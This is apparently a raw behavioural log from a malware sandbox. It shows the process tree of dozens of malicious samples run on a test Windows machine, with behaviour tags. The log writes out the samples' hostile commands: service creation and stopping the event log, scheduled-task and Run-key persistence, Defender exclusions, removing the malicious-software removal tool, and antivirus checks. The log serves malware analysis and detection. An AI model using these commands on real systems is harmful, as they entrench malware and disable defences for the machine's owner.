C:\Users\Admin\AppData\Local\Temp\Files\32.exe"C:\Users\Admin\AppData\Local\Temp\Files\32.exe"2⤵PID:5452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 2763⤵
- Program crash
PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\workforroc.exe"C:\Users\Admin\AppData\Local\Temp\Files\workforroc.exe"2⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"3⤵PID:6180
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"3⤵PID:6788
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵PID:5196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:5768
-
-
-
C:\Users\Admin\AppData\Local\Temp\rty25.exe"C:\Users\Admin\AppData\Local\Temp\rty25.exe"3⤵PID:3044
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\X1.exe"C:\Users\Admin\AppData\Local\Temp\Files\X1.exe"2⤵PID:5504
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "TQBWNGYW"3⤵
- Launches sc.exe
PID:6788
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "TQBWNGYW" binpath= "C:\ProgramData\odvhyxzhhqlu\gzexiztdwrwd.exe" start= "auto"3⤵
- Launches sc.exe
PID:5444
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "TQBWNGYW"3⤵
- Launches sc.exe
PID:5980
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\well.exe"C:\Users\Admin\AppData\Local\Temp\Files\well.exe"2⤵PID:364
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com3⤵
- Enumerates system info in registry
PID:6792 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffa71759758,0x7ffa71759768,0x7ffa717597784⤵PID:5160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1672 --field-trial-handle=1856,i,2745608857724057753,13800263960839702698,131072 /prefetch:84⤵PID:8008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1856,i,2745608857724057753,13800263960839702698,131072 /prefetch:24⤵PID:5292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe"C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe"2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:5456 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\Files\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707811454 "3⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\file.exe"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"2⤵PID:5844
-
-
C:\Users\Admin\AppData\Local\Temp\Files\npp86Installerx64.exe"C:\Users\Admin\AppData\Local\Temp\Files\npp86Installerx64.exe"2⤵
- Adds Run key to start application
PID:6192 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\npp.8.6.2.Installer.x64.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\npp.8.6.2.Installer.x64.exe3⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:6252 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\npp.8.6.2.Installer.x64.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\npp.8.6.2.Installer.x64.exe4⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cpu-z_2.09-en.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cpu-z_2.09-en.exe3⤵PID:6400
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe"C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe"2⤵
- Drops startup file
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
PID:6268 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 13⤵PID:6932
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 14⤵
- Creates scheduled task(s)
PID:6188
-
-
-
C:\Windows\SysWOW64\WSCript.exeWSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs3⤵PID:3440
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\T1_Net.exe"C:\Users\Admin\AppData\Local\Temp\Files\T1_Net.exe"2⤵PID:6832
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lumma.exe"C:\Users\Admin\AppData\Local\Temp\Files\lumma.exe"2⤵PID:6620
-
C:\Users\Admin\AppData\Local\Temp\Files\lumma.exe"C:\Users\Admin\AppData\Local\Temp\Files\lumma.exe"3⤵PID:6408
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\TierDiagnosis.exe"C:\Users\Admin\AppData\Local\Temp\Files\TierDiagnosis.exe"2⤵PID:6568
-
C:\Windows\SysWOW64\cmd.execmd /k cmd < Bathrooms & exit3⤵PID:7192
-
C:\Windows\SysWOW64\cmd.execmd4⤵PID:7800
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:8028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:1296
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\heaoyam78.exe"C:\Users\Admin\AppData\Local\Temp\Files\heaoyam78.exe"2⤵PID:6768
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup8.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup8.exe"2⤵PID:7864
-
-
C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"2⤵PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"2⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6264 -
C:\Users\Admin\AppData\Local\Temp\ARA.exe"C:\Users\Admin\AppData\Local\Temp\ARA.exe"4⤵
- Modifies registry class
PID:7228 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"5⤵PID:7680
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "6⤵PID:8332
-
C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"7⤵PID:8732
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe"C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe"2⤵PID:7984
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jet.exe"C:\Users\Admin\AppData\Local\Temp\Files\jet.exe"2⤵
- Loads dropped DLL
PID:7836
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghost.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghost.exe"2⤵
- Suspicious use of SetThreadContext
PID:6968 -
C:\Users\Admin\AppData\Local\Temp\Files\ghost.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghost.exe"3⤵PID:5580
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe"C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4680
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"2⤵PID:7840
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:6488
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /im chrome.exe /f4⤵
- Kills process with taskkill
PID:4272
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:6340
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:8136
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'3⤵PID:7764
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe"C:\Users\Admin\AppData\Local\Temp\Files\83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe"2⤵
- Checks SCSI registry key(s)
PID:6656
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe"2⤵PID:4152
-
-
C:\Users\Admin\AppData\Local\Temp\Files\_vti_cnf.exe"C:\Users\Admin\AppData\Local\Temp\Files\_vti_cnf.exe"2⤵
- Modifies WinLogon for persistence
- Disables RegEdit via registry modification
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
PID:7308 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C AT /delete /yes3⤵PID:6156
-
C:\Windows\SysWOW64\at.exeAT /delete /yes4⤵PID:5800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe3⤵PID:6324
-
C:\Windows\SysWOW64\at.exeAT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe4⤵PID:7980
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\abc.exe"C:\Users\Admin\AppData\Local\Temp\Files\abc.exe"2⤵
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
PID:6948 -
C:\ProgramData\FE44.tmp"C:\ProgramData\FE44.tmp"3⤵PID:6416
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\FE44.tmp >> NUL4⤵PID:7900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe"C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe"2⤵PID:5928
-
-
C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe"C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe"2⤵
- Suspicious use of SetThreadContext
PID:5780 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:7180
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe"C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe"2⤵
- Suspicious use of SetThreadContext
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe"C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe"3⤵
- Checks SCSI registry key(s)
PID:7468
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe"2⤵
- Adds Run key to start application
- Drops file in System32 directory
PID:1240 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:3336
-
-
C:\Windows\SysWOW64\SubDir\asg.exe"C:\Windows\SysWOW64\SubDir\asg.exe"3⤵
- Adds Run key to start application
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:6680 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\asg.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:8412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"2⤵PID:7124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵PID:8144
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe"C:\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6392
-
-
C:\Users\Admin\AppData\Local\Temp\Files\National.exe"C:\Users\Admin\AppData\Local\Temp\Files\National.exe"2⤵PID:3332
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6736
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"2⤵
- Checks processor information in registry
PID:7916
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Everything.exe"C:\Users\Admin\AppData\Local\Temp\Files\Everything.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe"C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe"2⤵PID:8084
-
C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe"C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %33⤵PID:5636
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c mode con:cols=0080 lines=00254⤵PID:1212
-
C:\Windows\SysWOW64\mode.commode con:cols=0080 lines=00255⤵
- Suspicious use of SetThreadContext
PID:5660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c title Window Title4⤵PID:6804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"4⤵PID:5284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"4⤵PID:8044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:5852 -
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\xtmp5⤵
- Views/modifies file attributes
PID:5480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt4⤵PID:5248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat4⤵PID:8980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp50888.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp50888.bat"4⤵PID:8972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp32238.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp32238.exe"4⤵PID:6704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp50888.bat "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %34⤵PID:696
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp50888.bat "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %35⤵PID:7924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp50888.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp50888.bat"4⤵PID:9396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp32238.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp32238.exe"4⤵PID:9692
-
-
-
C:\Users\Admin\AppData\Local\Temp\AITMP0\IconRemoval.exe"C:\Users\Admin\AppData\Local\Temp\AITMP0\IconRemoval.exe" /s %23⤵PID:10908
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7748
-
-
-
C:\Users\Admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe"C:\Users\Admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe" /s %13⤵PID:9648
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\rty27.exe"C:\Users\Admin\AppData\Local\Temp\Files\rty27.exe"2⤵PID:6976
-
-
C:\Users\Admin\AppData\Local\Temp\Files\easy.exe"C:\Users\Admin\AppData\Local\Temp\Files\easy.exe"2⤵PID:7516
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2176
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f0776.exe"C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f0776.exe"2⤵PID:7364
-
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"3⤵PID:1344
-
-
C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"3⤵PID:6084
-
-
C:\Users\Admin\AppData\Local\Temp\FourthX.exe"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"3⤵
- Drops file in System32 directory
PID:6632 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵PID:2872
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "UTIXDCVF"4⤵
- Launches sc.exe
PID:9128
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:8112
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6752
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"4⤵
- Launches sc.exe
PID:6328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "UTIXDCVF"4⤵
- Launches sc.exe
PID:7392
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:7180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7372
-
-
C:\Users\Admin\AppData\Local\Temp\Files\windows.exe"C:\Users\Admin\AppData\Local\Temp\Files\windows.exe"2⤵PID:4788
-
-
C:\Users\Admin\AppData\Local\Temp\Files\april.exe"C:\Users\Admin\AppData\Local\Temp\Files\april.exe"2⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\is-HP503.tmp\april.tmp"C:\Users\Admin\AppData\Local\Temp\is-HP503.tmp\april.tmp" /SL5="$404E4,5944334,54272,C:\Users\Admin\AppData\Local\Temp\Files\april.exe"3⤵
- Loads dropped DLL
PID:6156
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\update.exe"C:\Users\Admin\AppData\Local\Temp\Files\update.exe"2⤵PID:6136
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crpta.exe"C:\Users\Admin\AppData\Local\Temp\Files\crpta.exe"2⤵
- Suspicious use of SetThreadContext
PID:7464 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6420
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"2⤵PID:7208
-
C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"3⤵
- Loads dropped DLL
PID:5968
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7960
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"2⤵
- Drops file in Windows directory
PID:6412
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe"C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe"2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:3332 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f3⤵PID:6312
-
C:\Windows\system32\schtasks.exeschtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5800
-
-
-
-
C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exeC:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6892 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- Drops startup file
- Suspicious behavior: MapViewOfSection
PID:6552 -
C:\Windows\System32\certutil.exeC:\Windows\System32\certutil.exe4⤵
- Suspicious use of SetThreadContext
PID:8564 -
C:\Windows\explorer.exeexplorer.exe5⤵PID:7012
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Posh_v4_dropper_x64.exe"C:\Users\Admin\AppData\Local\Temp\Files\Posh_v4_dropper_x64.exe"2⤵PID:6796
-
-
C:\Users\Admin\AppData\Local\Temp\Files\23.exe"C:\Users\Admin\AppData\Local\Temp\Files\23.exe"2⤵
- Adds Run key to start application
PID:1300 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"3⤵PID:9604
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe"C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe"2⤵PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\1e3d458e7ef866069259cb3b13b761e46f6278c3fca69ca846baca650b4e0f72.exe"C:\Users\Admin\AppData\Local\Temp\Files\1e3d458e7ef866069259cb3b13b761e46f6278c3fca69ca846baca650b4e0f72.exe"2⤵PID:6816
-
C:\Users\Admin\AppData\Local\Temp\Files\1e3d458e7ef866069259cb3b13b761e46f6278c3fca69ca846baca650b4e0f72.exe"C:\Users\Admin\AppData\Local\Temp\Files\1e3d458e7ef866069259cb3b13b761e46f6278c3fca69ca846baca650b4e0f72.exe"3⤵PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"2⤵PID:7148
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c net use3⤵PID:8568
-
C:\Users\Admin\AppData\Local\Temp\Files\net.exenet use4⤵PID:8604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"2⤵PID:6828
-
-
C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:6480
-
-
